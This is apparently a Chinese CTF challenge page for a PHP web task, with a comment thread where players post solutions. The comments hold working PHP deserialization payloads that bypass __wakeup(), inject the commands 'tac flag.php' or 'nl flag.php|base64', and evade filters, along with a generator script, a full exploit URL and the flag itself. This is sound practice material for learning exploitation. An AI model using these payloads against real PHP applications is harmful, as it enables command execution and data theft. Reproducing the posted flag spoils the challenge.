安慰奖WEB 未解决

分数: 35 金币: 5
题目作者: harry
一  血: dotast
一血奖励: 2金币
解  决: 1740
提  示:
描  述:
flag{}
评论
Bojing 28天前

有哪里提示了username是admin的吗

回复 0

18956160518 2月前

https://blog.csdn.net/m0_57954651/article/details/127866733

回复 0

EtHat 5月前

O:3:"ctf":3:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

xht0525 7月前

nl flag.php|base64

回复 0

不会编程的崽 7月前

<?php class ctf{ protected $username = 'admin'; protected $cmd = 'tac flag.php'; } $flag=new ctf(); $flag_1=serialize($flag); echo $flag_1; ?>

回复 0

不会编程的崽 7月前

O:3:"ctf":2:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:12:"tac flag.php";}

回复 0

c41vin 11月前

0.代码在index.php.bak;1.修改反序列化后的属性数量(比2大即可),绕过wakup();2.注意protect序列化后*前后加%00;3.用tac绕过cat限制;4.payload:index.php?code=O%3A3%3A%22ctf%22%3A3%3A%7Bs%3A11%3A%22%00*%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A6

回复 0

wxy1343 11月前

http://114.67.175.224:18718/index.php?code=O:3:"ctf":5:{s:11:"%00*%00username";s:5:"admin";s:6:"%00*%00cmd";s:19:"tac flag.php|base64";}

回复 0

wxy1343 11月前

flag{Unser1alize_and_2CE_Add}

回复 0

yuanyipaceandlove 1年前

class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;

回复 0

WriteUp

image
小赵同学

3 金币

评分(3)

解题动态

xiaohaibao123 攻破了该题 2天前
player33 攻破了该题 3天前
gyssong 攻破了该题 3天前
xiuliyeer1 攻破了该题 3天前
星落 攻破了该题 5天前
Felidae 攻破了该题 8天前
WYEJOJO 攻破了该题 9天前
wzh98 攻破了该题 9天前
junzijie 攻破了该题 10天前
3599348780 攻破了该题 10天前
radar 攻破了该题 12天前
coolsword2023 攻破了该题 14天前
111jing 攻破了该题 19天前
LUCKY721 攻破了该题 20天前
Bojing 攻破了该题 28天前
18225355670 攻破了该题 29天前
OldWolfofFarron 攻破了该题 1月前
liqliq 攻破了该题 1月前
catdogpeach 攻破了该题 1月前
白牧羊人 攻破了该题 1月前